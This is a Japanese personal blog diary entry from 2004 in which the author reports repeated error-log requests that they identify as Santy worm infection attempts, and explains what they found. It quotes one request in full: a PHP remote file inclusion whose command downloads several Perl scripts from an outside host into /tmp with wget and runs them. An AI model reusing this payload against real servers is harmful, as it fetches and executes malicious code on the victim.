|
|
|
<< 2004年12月 >>
|
| 日 | 月 | 火 | 水 | 木 | 金 | 土 |
| |
|
|
1 |
2 |
3 |
4 |
| 5 |
6 |
7 |
8 |
9 |
10 |
11 |
| 12 |
13 |
14 |
15 |
16 |
17 |
18 |
| 19 |
20 |
21 |
22 |
23 |
24 |
25 |
| 26 |
27 |
28 |
29 |
30 |
31 |
|
| 2026年5月7日(木) |
|
- 2004年12月27日(月) 11:56 の日記 : また変なのが・・・
- エラーログにこんなのが残ってました。
http://www.shigeweb.jp/php/(省略)&page=http://www.visualcoders.net/spy.gif?&cmd=cd%20/tmp;wget%20www.visualcoders.net/spybot.txt;wget%20www.visualcoders.net/worm1.txt;wget%20www.visualcoders.net/php.txt;wget%20www.visualcoders.net/ownz.txt;wget%20www.visualcoders.net/zone.txt;perl%20spybot.txt;perl%20worm1.txt;perl%20ownz.txt;perl%20php.txt
上記URLへのリクエストが大量に残ってました。
「spy」とか「worm」とか怪しいキーワードが含まれてる辺り好意的なアクセスでないのは解かるんですが、これが何を目的としたものなのか?なぁ、という事でGoogle調べてみたら、どうやらGoogleを利用した攻撃であるらしい事が判明。
ちょっと前にYahoo!の記事になってた、「Santy」というワームの感染を試みるというものみたいです。
この攻撃に遭うと、スクリプトの貧弱性を利用して、サーバ上のファイルが書き換えられるという事みたいですが、幸い感染はしなかったので実害はないのですが、無意味なゴミログを大量に残されるのも実害みたいなもんなので、困ったものです。
|
